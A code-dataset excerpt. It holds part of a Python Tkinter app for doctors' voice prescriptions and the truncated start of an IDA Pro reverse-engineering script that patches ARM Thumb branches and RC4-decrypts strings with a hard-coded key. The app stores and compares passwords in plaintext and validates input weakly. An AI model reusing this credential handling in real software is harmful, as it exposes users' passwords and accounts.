AdvicE = Text(VpLisnwndw,font='-size 17',bg='#ffffff',height=5,width=117)\n AdvicE.place(x=5,y=662)\n\n SaVeButton = Button(VpLisnwndw,text='Save',cursor='hand2',background='#006F50',foreground='#ffffff',font='-size 15',height=0,width=8,command=storeprescrip)\n SaVeButton.place(x=5,y=800)\n\n checkgoogle = os.system('ping -n 1 www.google.com | FIND \"Reply\"')\n if checkgoogle==0:\n VpLisnwndw.after(2000,lISten)\n\ndef ChangE(cNme,cGdr,cDob,cPhn,cEid,cReg,cExp,cCln,cDgr,cUsr,cPas,cAon,cAtw,cAth):\n fname = StringVar()\n gendr = StringVar()\n dob = StringVar()\n phoneno = StringVar()\n eid = StringVar()\n regno = StringVar()\n exp = StringVar()\n cln = StringVar()\n dgr = StringVar()\n uname = StringVar()\n passwd = StringVar()\n aone = StringVar()\n atwo = StringVar()\n athr = StringVar()\n\n docdb = sqlite3.connect('drtalk')\n drcr = docdb.cursor()\n drcr.execute(\"\"\"select * from drs where Uname=?\"\"\",[cUsr])\n res=drcr.fetchall()\n docdb.commit()\n docdb.close()\n for row in res:\n NAME=row[0]\n GEND=row[1]\n DOB=row[2]\n PHNO=row[3]\n EID=row[4]\n REGN=row[5]\n EXP=row[6]\n CLN=row[7]\n DGR=row[8]\n UNME=row[9]\n PASS=row[10]\n AONE=row[11]\n ATWO=row[12]\n ATHR=row[13]\n\n def changerec():\n nmatch=0\n gmatch=0\n dobmatch=0\n phnomatch=0\n eidmatch=0\n regnomatch=0\n expmatch=0\n dgrmatch=0\n passwdmatch=0\n aonematch=0\n atwomatch=0\n athrmatch=0\n NamePattern=r'[a-zA-Z]|\\.'\n if re.match(NamePattern,fname.get()):\n nmatch=1\n else:\n nmatch=0\n GenderPattern=r'Male|Female|Others'\n if re.match(GenderPattern,gendr.get()):\n gmatch=1\n else:\n gmatch=0\n DobPattern=r'\\d{2}/\\d{2}/\\d{4}'\n if re.match(DobPattern,dob.get()):\n dobmatch=1\n else:\n dobmatch=0\n PhnoPattern=r'\\d{10}'\n if re.match(PhnoPattern,phoneno.get()):\n phnomatch=1\n else:\n phnomatch=0\n EidPattern=r'[a-zA-Z0-9.]*@[a-zA-Z]*\\.com'\n if re.match(EidPattern,eid.get()):\n eidmatch=1\n else:\n eidmatch=0\n RegnoPattern=r'\\d{6}'\n if re.match(RegnoPattern,regno.get()):\n regnomatch=1\n else:\n regnomatch=0\n ExpPattern=r'\\d{2}'\n if re.match(ExpPattern,exp.get()):\n expmatch=1\n else:\n expmatch=0\n DgrPattern=r'[a-zA-Z0-9. 
-]'\n if re.match(DgrPattern,dgr.get()):\n dgrmatch=1\n else:\n dgrmatch=0\n PasswdPattern=r'(?=.*\\d)(?=.*[a-z])(?=.*[A-Z])(?=.*\\W)'\n if re.match(PasswdPattern,passwd.get()):\n passwdmatch=1\n else:\n passwdmatch=0\n AnsPattern=r'[A-Z]+'\n if re.match(AnsPattern,aone.get()):\n aonematch=1\n else:\n aonematch=0\n if re.match(AnsPattern,atwo.get()):\n atwomatch=1\n else:\n atwomatch=0\n if re.match(AnsPattern,athr.get()):\n athrmatch=1\n else:\n athrmatch=0\n if nmatch and gmatch and dobmatch and phnomatch and eidmatch and regnomatch and expmatch and dgrmatch and passwdmatch and aonematch and atwomatch and athrmatch==1:\n print('Matched')\n docdb = sqlite3.connect('drtalk')\n drcr = docdb.cursor()\n drcr.execute(\"\"\"UPDATE drs SET Name=?,Gender=?,Dob=?,PhoneNo=?,Eid=?,RegNo=?,Exp=?,Cln=?,Dgr=?,Uname=?,Passwd=?,Aone=?,Atwo=?,Athr=? where Uname=?\"\"\",[fname.get(), gendr.get(), dob.get(), phoneno.get(), eid.get(), regno.get(), exp.get(), cln.get(), dgr.get(), uname.get(), passwd.get(), aone.get(), atwo.get(), athr.get(),cUsr])\n docdb.commit()\n docdb.close()\n window.destroy()\n else:\n print('Not Matched')\n messagebox.showinfo(\"Wrong Entries\", \"Please Enter Informations in correct format\")\n\n def gOback():\n loggedin(cNme,cGdr,cDob,cPhn,cEid,cReg,cExp,cCln,cDgr,cUsr,cPas,cAon,cAtw,cAth)\n \n changeframe = Frame(window,bg='#ffffff',height=649,width=1536,background='#ffffff')\n changeframe.place(x=0,y=191)\n \n personalinfo = LabelFrame(changeframe,text='Personal Information:',font='-size 18 -weight bold',bd=6,bg='#ffffff',height=130,width=1535)\n personalinfo.place(x=0,y=5)\n\n nam = Label(personalinfo,text='Fullname:',bg='#ffffff',font='-size 18')\n nam.place(x=5,y=5)\n nme = Entry(personalinfo,bg='#ffffff',textvariable=fname,font='-size 17',width=107)\n nme.place(x=119,y=7)\n nme.insert(0,NAME)\n\n gndr = Label(personalinfo,text='Gender:',bg='#ffffff',font='-size 18')\n gendrbtn1 = Radiobutton(personalinfo,text='Male',tristatevalue='x',bg='#ffffff',variable=gendr,value='Male',font='-size 16')\n gendrbtn2 = Radiobutton(personalinfo,text='Female',tristatevalue='x',bg='#ffffff',variable=gendr,value='Female',font='-size 16')\n gendrbtn3 = Radiobutton(personalinfo,text='Others',tristatevalue='x',bg='#ffffff',variable=gendr,value='Others',font='-size 16')\n gndr.place(x=5,y=45)\n gendrbtn1.place(x=100,y=44)\n gendrbtn2.place(x=180,y=44)\n gendrbtn3.place(x=286,y=44)\n if GEND=='Male':\n gendrbtn1.select()\n elif GEND=='Female':\n gendrbtn2.select()\n elif GEND=='Others':\n gendrbtn3.select()\n else:\n print('Wrong value')\n\n DoB = Label(personalinfo,text='D.O.B (dd/mm/yyyy):',bg='#ffffff',font='-size 18')\n DoB.place(x=395,y=45)\n Dob = Entry(personalinfo,bg='#ffffff',textvariable=dob,font='-size 17',width=9)\n Dob.place(x=628,y=47)\n Dob.insert(0,DOB)\n\n Phn = Label(personalinfo,text='Contact Number:',bg='#ffffff',font='-size 18')\n Phn.place(x=760,y=45)\n Phno = Entry(personalinfo,bg='#ffffff',textvariable=phoneno,font='-size 17',width=10)\n Phno.place(x=950,y=47)\n Phno.insert(0,PHNO)\n\n Eml = Label(personalinfo,text='Email Id:',bg='#ffffff',font='-size 18')\n Eml.place(x=1110,y=45)\n Email = Entry(personalinfo,bg='#ffffff',textvariable=eid,font='-size 17',width=23)\n Email.place(x=1210,y=47)\n Email.insert(0,EID)\n\n professionalinfo = LabelFrame(changeframe,text='Professional Information:',font='-size 18 -weight bold',bd=6,bg='#ffffff',height=130,width=1535)\n professionalinfo.place(x=0,y=140)\n\n Regno = Label(professionalinfo,text='Registeration 
Number:',bg='#ffffff',font='-size 18')\n Regno.place(x=0,y=5)\n RegNo = Entry(professionalinfo,bg='#ffffff',textvariable=regno,font='-size 17',width=6)\n RegNo.place(x=250,y=7)\n RegNo.insert(0,REGN)\n\n ExP = Label(professionalinfo,text='Experience (In Years):',bg='#ffffff',font='-size 18')\n ExP.place(x=350,y=5)\n Exp = Entry(professionalinfo,bg='#ffffff',textvariable=exp,font='-size 17',width=2)\n Exp.place(x=595,y=7)\n Exp.insert(0,EXP)\n\n ClN = Label(professionalinfo,text='Clinic Name:',bg='#ffffff',font='-size 18')\n ClN.place(x=644,y=5)\n Cln = Entry(professionalinfo,bg='#ffffff',textvariable=cln,font='-size 17',width=55)\n Cln.place(x=793,y=7)\n Cln.insert(0,CLN)\n\n DgR = Label(professionalinfo,text='Education Qualification:',bg='#ffffff',font='-size 18')\n DgR.place(x=0,y=45)\n Dgr = Entry(professionalinfo,bg='#ffffff',textvariable=dgr,font='-size 17',width=96)\n Dgr.place(x=260,y=47)\n Dgr.insert(0,DGR)\n\n UsrNme = Label(changeframe,text='Username:',font='-size 18 -weight bold',bg='#ffffff')\n UsrNme.place(x=4,y=270)\n usernam = Entry(changeframe,background='#ffffff',textvariable=uname,font='-size 17',width=48)\n usernam.place(x=130,y=274)\n usernam.insert(0,UNME)\n\n pas = Label(changeframe,background='white',text='Password:',font='-size 18 -weight bold')\n pas.place(x=760,y=270)\n psswd = Entry(changeframe,background='#ffffff',textvariable=passwd,font='-size 17',width=48)\n psswd.place(x=890,y=274)\n psswd.insert(0,PASS)\n\n tac = LabelFrame(changeframe,text='Terms and Condition:',font='-size 18 -weight bold',bd=6,bg='#ffffff',height=285,width=1535)\n tac.place(x=0,y=307)\n\n fpaes1 = Label(tac,text='By chance if you forgot your password then by clicking on forgot password, You have answer the below given questions and you can change',bg='#ffffff',font='-size 18')\n fpaes1.place(x=0,y=5)\n\n fpaes2 = Label(tac,text='your password. Another thing is the application will accept only those Email Ids which are based on .com servers so you must enter only tho-',bg='#ffffff',font='-size 18')\n fpaes2.place(x=0,y=45)\n\n fpaes3 = Label(tac,text='-se emails having .com at end. Your password must contain set of numbers, letters (both Capital and small) and special symbols.',bg='#ffffff',font='-size 18')\n fpaes3.place(x=0,y=85)\n\n Ques1 = Label(tac,background='white',text='Q1) What is your Nickname? (All words must be in capital letters)',font='-size 18')\n Ques1.place(x=0,y=125)\n\n Answ1 = Entry(tac,background='#ffffff',textvariable=aone,font='-size 17',width=61)\n Answ1.place(x=710,y=127)\n Answ1.insert(0,AONE)\n\n Ques2 = Label(tac,background='white',text='Q2) Which city you love the most? (All words must be in capital letters)',font='-size 18')\n Ques2.place(x=0,y=165)\n\n Answ2 = Entry(tac,background='#ffffff',textvariable=atwo,font='-size 17',width=57)\n Answ2.place(x=764,y=167)\n Answ2.insert(0,ATWO)\n\n Ques3 = Label(tac,background='white',text='Q3) What is the name of your first school? 
(All words must be in capital letters)',font='-size 18')\n Ques3.place(x=0,y=205)\n\n Answ3 = Entry(tac,background='#ffffff',textvariable=athr,font='-size 17',width=50)\n Answ3.place(x=855,y=207)\n Answ3.insert(0,ATHR)\n\n CanceL = Button(changeframe,text='Cancel',cursor='hand2',background='#006F50',foreground='#ffffff',font='-size 17',height=1,width=10,command=gOback)\n CanceL.place(x=5,y=596)\n\n ConFirm = Button(changeframe,text='confirm',cursor='hand2',background='#006F50',foreground='#ffffff',font='-size 17',height=1,width=10,command=changerec)\n ConFirm.place(x=1390,y=596)\n\ndef loggedin(N,G,Do,Ph,Ei,R,Ex,C,Dg,U,Pa,Ao,At,Ar):\n def cnvpcall():\n cnvp(N,G,Do,Ph,Ei,R,Ex,C,Dg,U,Pa,Ao,At,Ar)\n\n def LogOut():\n signinfn()\n\n def ChAngE():\n ChangE(N,G,Do,Ph,Ei,R,Ex,C,Dg,U,Pa,Ao,At,Ar)\n \n loggedinframe = Frame(window,bg='#ffffff',height=649,width=1536,background='#ffffff')\n loggedinframe.place(x=0,y=191)\n\n userinfo = LabelFrame(loggedinframe,text='User Information:',font='-size 18 -weight bold',bd=6,bg='#ffffff',height=165,width=1535)\n userinfo.place(x=0,y=5)\n \n helLO = Label(userinfo,background='white',text='Hello:',font='-size 18')\n helLO.place(x=5,y=5)\n\n DrName = Label(userinfo,background='white',text=N,font='-size 18',fg='#006f50')\n DrName.place(x=75,y=5)\n\n regNO = Label(userinfo,background='white',text='Registeration Number:',font='-size 18')\n regNO.place(x=1150,y=5)\n\n REgNo = Label(userinfo,background='white',text=R,font='-size 18',fg='#006f50')\n REgNo.place(x=1400,y=5)\n\n DrDgr = Label(userinfo,background='white',text=Dg,font='-size 18',fg='#006f50')\n DrDgr.place(x=5,y=45)\n\n Phnolbl = Label(userinfo,background='white',text='Phone Number:',font='-size 18')\n Phnolbl.place(x=1150,y=45)\n\n PhnNo = Label(userinfo,background='white',text=Ph,font='-size 18',fg='#006f50')\n PhnNo.place(x=1330,y=45)\n\n DrDgr = Label(userinfo,background='white',text=C,font='-size 18',fg='#006f50')\n DrDgr.place(x=5,y=85)\n\n chngbtn = Button(userinfo,text='Change',cursor='hand2',background='#006F50',foreground='#ffffff',font='-size 15',height=0,width=8,command=ChAngE)\n chngbtn.place(x=1150,y=85)\n\n LogouT = Button(userinfo,text='Sign Out',cursor='hand2',background='#006F50',foreground='#ffffff',font='-size 15',height=0,width=8,command=LogOut)\n LogouT.place(x=1422,y=85)\n\n CrtNwPrscrpn= Button(loggedinframe,text='Create\\nNew\\nVoice\\nPrescription',cursor='hand2',background='#006F50',foreground='#ffffff',font='-size 18',height=4,width=10,command=cnvpcall)\n CrtNwPrscrpn.place(x=50,y=335)\n\n hst = sqlite3.connect('drtalk')\n hcr = hst.cursor()\n hcr.execute(\"\"\"select * from ps where DrregNO=?\"\"\",[R])\n hst.commit()\n res = hcr.fetchall()\n hst.close()\n\n HistoryFrame = Listbox(loggedinframe,bg='#ffffff',font='-size 18')\n HistoryFrame.place(x=250,y=170,height=475,width=1283)\n\n scroLLbar = Scrollbar(HistoryFrame,jump=0)\n scroLLbar.pack(side=RIGHT,fill=Y)\n\n for row in res:\n NameVAR=row[0]\n GendVAR=row[1]\n AgeVAR=row[2]\n SymptVAR=row[3]\n DiagVAR=row[4]\n PrscVAR=row[5]\n AdvVAR=row[6]\n PrnoVAR=row[8]\n HistoryFrame.insert(END, f\"Name:{NameVAR} Gender:{GendVAR} Age:{row[2]} Document Name:{PrnoVAR}\")\n HistoryFrame.insert(END,'')\n HistoryFrame.config(yscrollcommand=scroLLbar.set)\n scroLLbar.config(command=HistoryFrame.yview)\n\ndef FPass():\n usname = StringVar()\n Passwd = StringVar()\n Avn = StringVar()\n Tu = StringVar()\n Tre = StringVar()\n PasswdPattern=r'(?=.*\\d)(?=.*[a-z])(?=.*[A-Z])(?=.*\\W)'\n def cpdata():\n docdb = sqlite3.connect('drtalk')\n drcr 
= docdb.cursor()\n drcr.execute(\"\"\"select * from drs where Uname=?\"\"\",[usname.get()])\n docdb.commit()\n res=drcr.fetchall()\n docdb.close()\n for row in res:\n AOne=row[11]\n ATwo=row[12]\n AThr=row[13]\n if AOne==Avn.get() and ATwo==Tu.get() and AThr==Tre.get() and re.match(PasswdPattern,Passwd.get()):\n docdb = sqlite3.connect('drtalk')\n drcr = docdb.cursor()\n drcr.execute(\"\"\"UPDATE drs SET Passwd=? where Uname=?\"\"\",[Passwd.get(),usname.get()])\n docdb.commit()\n docdb.close()\n window.destroy()\n else:\n messagebox.showinfo(\"Wrong Entries\", \"Please Enter Informations in correct format\")\n\n fpassframe = Frame(window,bg='#ffffff',height=649,width=1536,background='#ffffff')\n fpassframe.place(x=0,y=191)\n \n unam = Label(fpassframe,background='white',text='Username',font='-size 18 -weight bold')\n unam.place(x=590,y=50)\n\n usrname = Entry(fpassframe,textvariable=usname,background='#ffffff',font='-size 17',borderwidth=2,relief='groove')\n usrname.place(x=750,y=52)\n\n QaA = LabelFrame(fpassframe,text='Question and Answers:',font='-size 18 -weight bold',bd=6,bg='#ffffff',height=285,width=1535)\n QaA.place(x=0,y=130)\n\n Ques1 = Label(QaA,background='white',text='Q1) What is your Nickname? (All words must be in capital letters)',font='-size 18')\n Ques1.place(x=0,y=5)\n\n Answ1 = Entry(QaA,background='#ffffff',textvariable=Avn,font='-size 17',width=61)\n Answ1.place(x=710,y=5)\n\n Ques2 = Label(QaA,background='white',text='Q2) Which city you love the most? (All words must be in capital letters)',font='-size 18')\n Ques2.place(x=0,y=110)\n\n Answ2 = Entry(QaA,background='#ffffff',textvariable=Tu,font='-size 17',width=57)\n Answ2.place(x=764,y=110)\n\n Ques3 = Label(QaA,background='white',text='Q3) What is the name of your first school? 
(All words must be in capital letters)',font='-size 18')\n Ques3.place(x=0,y=205)\n\n Answ3 = Entry(QaA,background='#ffffff',textvariable=Tre,font='-size 17',width=50)\n Answ3.place(x=855,y=207)\n\n npaSS = Label(fpassframe,background='white',text='New Password:',font='-size 18 -weight bold')\n npaSS.place(x=570,y=450)\n\n npass = Entry(fpassframe,textvariable=Passwd,background='#ffffff',font='-size 17',borderwidth=2,relief='groove')\n npass.place(x=750,y=452)\n\n confirM = Button(fpassframe,text='Confirm',cursor='hand2',background='#006F50',foreground='#ffffff',font='-size 17',height=1,width=10,command=cpdata)\n confirM.place(x=600,y=570)\n\n SiGnin = Button(fpassframe,text='Back',cursor='hand2',background='#006F50',foreground='#ffffff',font='-size 17',height=1,width=10,command=signinfn)\n SiGnin.place(x=800,y=570)\n\ndef signinfn():\n uname = StringVar()\n passwd = StringVar()\n\n def FPaSs():\n FPass()\n \n def signin():\n docdb = sqlite3.connect('drtalk')\n drcr = docdb.cursor()\n drcr.execute(\"\"\"select * from drs where Uname=?\"\"\",[uname.get()])\n docdb.commit()\n res=drcr.fetchall()\n docdb.close()\n for row in res:\n NAme=row[0]\n GNdr=row[1]\n DOb=row[2]\n PHno=row[3]\n EId=row[4]\n RGno=row[5]\n EXp=row[6]\n CLn=row[7]\n DGr=row[8]\n UName=row[9]\n PAsswd=row[10]\n AOne=row[11]\n ATwo=row[12]\n AThr=row[13]\n try:\n if PAsswd == passwd.get():\n loggedin(NAme,GNdr,DOb,PHno,EId,RGno,EXp,CLn,DGr,UName,PAsswd,AOne,ATwo,AThr)\n except UnboundLocalError:\n messagebox.showinfo(\"Unknown Entry\", \"No records available at this username.\\nPlease get registerd.\")\n \n signinframe = Frame(window,bg='#ffffff',height=649,width=1536,background='#ffffff')\n signinframe.place(x=0,y=191)\n \n unam = Label(signinframe,background='white',text='Username',font='-size 18 -weight bold')\n unam.place(x=590,y=30)\n\n usrname = Entry(signinframe,background='#ffffff',textvariable=uname,font='-size 17',borderwidth=2,relief='groove')\n usrname.place(x=750,y=30)\n\n pas = Label(signinframe,background='white',text='Password',font='-size 18 -weight bold')\n pas.place(x=590,y=100)\n\n paswd = Entry(signinframe,background='#ffffff',textvariable=passwd,font='-size 17',borderwidth=2,relief='groove',show=\"*\")\n paswd.place(x=750,y=100)\n\n sgnin = Button(signinframe,text='Sign in',cursor='hand2',background='#006F50',foreground='#ffffff',font='-size 17',height=1,width=10,command=signin)\n sgnin.place(x=640,y=170)\n\n sgnup = Button(signinframe,text='Sign up',cursor='hand2',background='#006F50',foreground='#ffffff',font='-size 17',height=1,width=10,command=signupfn)\n sgnup.place(x=805,y=170)\n\n fpass = Label(signinframe,background='white',text='Forgot password ~~>',font='-size 14')\n fpass.place(x=590,y=245)\n\n fpbtn = Button(signinframe,text='Click Here',cursor='hand2',background='#006F50',foreground='#ffffff',font='-size 14',height=1,width=15,command=FPaSs)\n fpbtn.place(x=805,y=240)\n\ndef signupfn():\n fname = StringVar()\n gendr = StringVar()\n dob = StringVar()\n phoneno = StringVar()\n eid = StringVar()\n regno = StringVar()\n exp = StringVar()\n cln = StringVar()\n dgr = StringVar()\n uname = StringVar()\n passwd = StringVar()\n aone = StringVar()\n atwo = StringVar()\n athr = StringVar()\n\n def signup():\n nmatch=0\n gmatch=0\n dobmatch=0\n phnomatch=0\n eidmatch=0\n regnomatch=0\n expmatch=0\n dgrmatch=0\n passwdmatch=0\n aonematch=0\n atwomatch=0\n athrmatch=0\n NamePattern=r'[a-zA-Z]|\\.'\n if re.match(NamePattern,fname.get()):\n nmatch=1\n else:\n nmatch=0\n 
GenderPattern=r'Male|Female|Others'\n if re.match(GenderPattern,gendr.get()):\n gmatch=1\n else:\n gmatch=0\n DobPattern=r'\\d{2}/\\d{2}/\\d{4}'\n if re.match(DobPattern,dob.get()):\n dobmatch=1\n else:\n dobmatch=0\n PhnoPattern=r'\\d{10}'\n if re.match(PhnoPattern,phoneno.get()):\n phnomatch=1\n else:\n phnomatch=0\n EidPattern=r'[a-zA-Z0-9.]*@[a-zA-Z]*\\.com'\n if re.match(EidPattern,eid.get()):\n eidmatch=1\n else:\n eidmatch=0\n RegnoPattern=r'\\d{6}'\n if re.match(RegnoPattern,regno.get()):\n regnomatch=1\n else:\n regnomatch=0\n ExpPattern=r'\\d{2}'\n if re.match(ExpPattern,exp.get()):\n expmatch=1\n else:\n expmatch=0\n DgrPattern=r'[a-zA-Z0-9. -]'\n if re.match(DgrPattern,dgr.get()):\n dgrmatch=1\n else:\n dgrmatch=0\n PasswdPattern=r'(?=.*\\d)(?=.*[a-z])(?=.*[A-Z])(?=.*\\W)'\n if re.match(PasswdPattern,passwd.get()):\n passwdmatch=1\n else:\n passwdmatch=0\n AnsPattern=r'[A-Z]+'\n if re.match(AnsPattern,aone.get()):\n aonematch=1\n else:\n aonematch=0\n if re.match(AnsPattern,atwo.get()):\n atwomatch=1\n else:\n atwomatch=0\n if re.match(AnsPattern,athr.get()):\n athrmatch=1\n else:\n athrmatch=0\n if nmatch and gmatch and dobmatch and phnomatch and eidmatch and regnomatch and expmatch and dgrmatch and passwdmatch and aonematch and atwomatch and athrmatch==1:\n print('Matched')\n docdb = sqlite3.connect('drtalk')\n drcr = docdb.cursor()\n drcr.execute(\"\"\"create table if not exists drs(Name VARCHAR,Gender VARCHAR,Dob VARCHAR,PhoneNo VARCHAR UNIQUE,Eid VARCHAR UNIQUE,RegNo VARCHAR UNIQUE,Exp VARCHAR,Cln VARCHAR,Dgr VARCHAR,Uname VARCHAR PRIMARY KEY,Passwd VARCHAR,Aone VARCHAR,Atwo VARCHAR,Athr VARCHAR)\"\"\")\n drcr.execute(\"\"\"insert into drs VALUES(?,?,?,?,?,?,?,?,?,?,?,?,?,?)\"\"\",(fname.get(), gendr.get(), dob.get(), phoneno.get(), eid.get(), regno.get(), exp.get(), cln.get(), dgr.get(), uname.get(), passwd.get(), aone.get(), atwo.get(), athr.get()))\n docdb.commit()\n docdb.close()\n signinfn()\n else:\n print('Not Matched')\n messagebox.showinfo(\"Wrong Entries\", \"Please Enter Informations in correct format\")\n \n signupframe = Frame(window,bg='#ffffff',height=649,width=1536,background='#ffffff')\n signupframe.place(x=0,y=191)\n \n personalinfo = LabelFrame(signupframe,text='Personal Information:',font='-size 18 -weight bold',bd=6,bg='#ffffff',height=130,width=1535)\n personalinfo.place(x=0,y=5)\n\n nam = Label(personalinfo,text='Fullname:',bg='#ffffff',font='-size 18')\n nam.place(x=5,y=5)\n\n nme = Entry(personalinfo,bg='#ffffff',textvariable=fname,font='-size 17',width=107)\n nme.place(x=119,y=7)\n\n gndr = Label(personalinfo,text='Gender:',bg='#ffffff',font='-size 18')\n gendrbtn1 = Radiobutton(personalinfo,text='Male',tristatevalue='x',bg='#ffffff',variable=gendr,value='Male',font='-size 16')\n gendrbtn2 = Radiobutton(personalinfo,text='Female',tristatevalue='x',bg='#ffffff',variable=gendr,value='Female',font='-size 16')\n gendrbtn3 = Radiobutton(personalinfo,text='Others',tristatevalue='x',bg='#ffffff',variable=gendr,value='Others',font='-size 16')\n gndr.place(x=5,y=45)\n gendrbtn1.place(x=100,y=44)\n gendrbtn2.place(x=180,y=44)\n gendrbtn3.place(x=286,y=44)\n\n DoB = Label(personalinfo,text='D.O.B (dd/mm/yyyy):',bg='#ffffff',font='-size 18')\n DoB.place(x=395,y=45)\n Dob = Entry(personalinfo,bg='#ffffff',textvariable=dob,font='-size 17',width=9)\n Dob.place(x=628,y=47)\n\n Phn = Label(personalinfo,text='Contact Number:',bg='#ffffff',font='-size 18')\n Phn.place(x=760,y=45)\n Phno = Entry(personalinfo,bg='#ffffff',textvariable=phoneno,font='-size 
17',width=10)\n Phno.place(x=950,y=47)\n\n Eml = Label(personalinfo,text='Email Id:',bg='#ffffff',font='-size 18')\n Eml.place(x=1110,y=45)\n Email = Entry(personalinfo,bg='#ffffff',textvariable=eid,font='-size 17',width=23)\n Email.place(x=1210,y=47)\n\n professionalinfo = LabelFrame(signupframe,text='Professional Information:',font='-size 18 -weight bold',bd=6,bg='#ffffff',height=130,width=1535)\n professionalinfo.place(x=0,y=140)\n\n Regno = Label(professionalinfo,text='Registeration Number:',bg='#ffffff',font='-size 18')\n Regno.place(x=0,y=5)\n\n RegNo = Entry(professionalinfo,bg='#ffffff',textvariable=regno,font='-size 17',width=6)\n RegNo.place(x=250,y=7)\n\n ExP = Label(professionalinfo,text='Experience (In Years):',bg='#ffffff',font='-size 18')\n ExP.place(x=350,y=5)\n\n Exp = Entry(professionalinfo,bg='#ffffff',textvariable=exp,font='-size 17',width=2)\n Exp.place(x=595,y=7)\n\n ClN = Label(professionalinfo,text='Clinic Name:',bg='#ffffff',font='-size 18')\n ClN.place(x=644,y=5)\n\n Cln = Entry(professionalinfo,bg='#ffffff',textvariable=cln,font='-size 17',width=55)\n Cln.place(x=793,y=7)\n\n DgR = Label(professionalinfo,text='Education Qualification:',bg='#ffffff',font='-size 18')\n DgR.place(x=0,y=45)\n\n Dgr = Entry(professionalinfo,bg='#ffffff',textvariable=dgr,font='-size 17',width=96)\n Dgr.place(x=260,y=47)\n\n UsrNme = Label(signupframe,text='Username:',font='-size 18 -weight bold',bg='#ffffff')\n UsrNme.place(x=4,y=270)\n\n usernam = Entry(signupframe,background='#ffffff',textvariable=uname,font='-size 17',width=48)\n usernam.place(x=130,y=274)\n\n pas = Label(signupframe,background='white',text='Password:',font='-size 18 -weight bold')\n pas.place(x=760,y=270)\n\n psswd = Entry(signupframe,background='#ffffff',textvariable=passwd,font='-size 17',width=48)\n psswd.place(x=890,y=274)\n\n tac = LabelFrame(signupframe,text='Terms and Condition:',font='-size 18 -weight bold',bd=6,bg='#ffffff',height=285,width=1535)\n tac.place(x=0,y=307)\n\n fpaes1 = Label(tac,text='By chance if you forgot your password then by clicking on forgot password, You have answer the below given questions and you can change',bg='#ffffff',font='-size 18')\n fpaes1.place(x=0,y=5)\n\n fpaes2 = Label(tac,text='your password. Another thing is the application will accept only those Email Ids which are based on .com servers so you must enter only tho-',bg='#ffffff',font='-size 18')\n fpaes2.place(x=0,y=45)\n\n fpaes3 = Label(tac,text='-se emails having .com at end. Your password must contain set of numbers, letters (both Capital and small) and special symbols.',bg='#ffffff',font='-size 18')\n fpaes3.place(x=0,y=85)\n\n Ques1 = Label(tac,background='white',text='Q1) What is your Nickname? (All words must be in capital letters)',font='-size 18')\n Ques1.place(x=0,y=125)\n\n Answ1 = Entry(tac,background='#ffffff',textvariable=aone,font='-size 17',width=61)\n Answ1.place(x=710,y=127)\n\n Ques2 = Label(tac,background='white',text='Q2) Which city you love the most? (All words must be in capital letters)',font='-size 18')\n Ques2.place(x=0,y=165)\n\n Answ2 = Entry(tac,background='#ffffff',textvariable=atwo,font='-size 17',width=57)\n Answ2.place(x=764,y=167)\n\n Ques3 = Label(tac,background='white',text='Q3) What is the name of your first school? 
(All words must be in capital letters)',font='-size 18')\n Ques3.place(x=0,y=205)\n\n Answ3 = Entry(tac,background='#ffffff',textvariable=athr,font='-size 17',width=50)\n Answ3.place(x=855,y=207)\n\n preV = Button(signupframe,text='Sign In',cursor='hand2',background='#006F50',foreground='#ffffff',font='-size 17',height=1,width=10,command=signinfn)\n preV.place(x=5,y=596)\n\n Prev = Label(signupframe,background='white',text='(Previous)',font='-size 18')\n Prev.place(x=150,y=601)\n\n Nxt = Button(signupframe,text='Sign Up',cursor='hand2',background='#006F50',foreground='#ffffff',font='-size 17',height=1,width=10,command=signup)\n Nxt.place(x=1390,y=596)\n\n nxT = Label(signupframe,background='white',text='(Next)',font='-size 18')\n nxT.place(x=1315,y=601) \n\nsigninfn()\n\nwindow.mainloop()\n"
}
] | 1 |
lin1man/sgmainRev | https://github.com/lin1man/sgmainRev | 74865f71237de7832bcdc4f380f494c0945b481f | fe5eda399dc57ab66dee8b6d930e6e6b46f3b998 | b761a48157800bb43a601a0a51d459664e87e8bf | refs/heads/master | 2022-11-14T14:23:21.027563 | 2020-07-07T07:12:37 | 2020-07-07T07:12:37 | 29,680,614 | 1 | 5 | null | null | null | null | null | [
{
"alpha_fraction": 0.38854336738586426,
"alphanum_fraction": 0.48794326186180115,
"avg_line_length": 42.931373596191406,
"blob_id": "60abde779a246773494d459e004ef2fc139f8951",
"content_id": "f33b8fdb02e5efef0947c6483c5586a52eb8ce22",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 18330,
"license_type": "no_license",
"max_line_length": 149,
"num_lines": 408,
"path": "/patch.py",
"repo_name": "lin1man/sgmainRev",
"src_encoding": "UTF-8",
"text": "from idc import *\r\nfrom idaapi import *\r\nfrom idautils import *\r\nfrom Crypto.Cipher import ARC4\r\nfrom capstone import *\r\nfrom capstone.arm import *\r\n\r\ndef str_bytearray(str):\r\n return ' '.join(hex(x) for x in bytearray(str))\r\n\r\ndef put_unconditional_branch(source, destination):\r\n offset = (destination - source - 4) >> 1\r\n if offset > 2097151 or offset < -2097152: # 0x200000 2MB\r\n raise RuntimeError(\"Invalid offset\")\r\n if offset > 1023 or offset < -1024:\r\n instruction1 = 0xf000 | ((offset >> 11) & 0x7ff)\r\n instruction2 = 0xb800 | (offset & 0x7ff)\r\n patch_word(source, instruction1)\r\n patch_word(source + 2, instruction2)\r\n else:\r\n instruction = 0xe000 | (offset & 0x7ff)\r\n patch_word(source, instruction)\r\n\r\n\r\ndef put_bl_branch(source, destination):\r\n offset = (destination - source - 4 - 2) >> 1 #4 for pc, 2 for PUSH {LR}\r\n if offset > 2097151 or offset < -2097152: # 0x200000 2MB\r\n raise RuntimeError(\"Invalid offset\")\r\n instruction1 = 0xb500 #PUSH {LR}\r\n instruction2 = 0xf000 | ((offset >> 11) & 0x7ff) #BL imm10\r\n instruction3 = 0xf800 | (offset & 0x7ff) #BL imm11 imm32=signExtend(s:0:0:imm10:imm11:'0',32)\r\n instruction4 = 0xbd00 #PUSH {PC}\r\n patch_word(source, instruction1)\r\n patch_word(source+2, instruction2)\r\n patch_word(source+4, instruction3)\r\n patch_word(source+6, instruction4)\r\n\r\n\r\n\r\ndef rc4Decrypt():\r\n ea = here()\r\n length = ask_long(1,\"Specify length\")\r\n if length > 1:\r\n rc4 = ARC4.new(\"DcO/lcK+h?m3c*q@\")\r\n str = rc4.decrypt(get_bytes(ea, length))\r\n MakeComm(ea, str)\r\n\r\n\r\ndef cs_disasm(arch, mode, code, offset):\r\n try:\r\n md = Cs(arch, mode)\r\n md.detail = True\r\n inss = []\r\n for insn in md.disasm(code, offset):\r\n 